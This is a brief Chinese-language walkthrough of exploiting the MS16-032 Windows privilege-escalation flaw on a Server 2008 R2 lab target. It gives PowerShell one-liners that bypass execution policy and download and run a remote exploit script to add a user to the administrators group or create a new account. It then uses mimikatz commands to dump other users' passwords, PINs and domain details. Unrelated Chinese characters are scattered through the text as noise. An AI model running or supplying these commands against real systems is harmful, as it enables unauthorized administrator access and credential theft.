MS16-032漏洞利用
靶機:Windows?server2008R2
1、 創(chuàng)建標準用戶。創(chuàng)建用戶zhuzhuxia,此用戶為普通用戶。在cmd下使用net?user?zhuzhuxia可以看到在*user組中跷车。
2、 提權(quán)橱野。使用MS16-032漏洞朽缴,使用powershell一句話提權(quán),將zhuzhuxia這個用戶放到管理員組中去水援。利用腳本如下:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators zhuzhuxia /add'"
執(zhí)行完命令后密强,有如下提示茅郎,說明提權(quán)成功。
?再執(zhí)行命令net?user?zhuzhuxia或渤,zhuzhuxia這個用戶已經(jīng)歸到管理員組系冗。這時候就可以為所欲為了。
如下圖所示薪鹦。
此時還可以借助mimikatz工具來竊取本機其他賬號和密碼掌敬。使用管理員身份運行該程序。
打開mimikatz后池磁,分別執(zhí)行privilege::debug
sekurlsa::logonpasswords
執(zhí)行完命令后奔害,可以獲取到其他用戶和密碼、PIN地熄、所在域等信息.
PS:提權(quán)后執(zhí)行某些進程或程序华临,如修改IP,需要輸入密碼訪客執(zhí)行端考,若不知道當前用戶密碼雅潭,可以執(zhí)行命令創(chuàng)建用戶sunwukong:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user sunwukong CVTE@123 /add'"
此用戶為標準用戶,可以再次使用步驟2提權(quán)即可却特。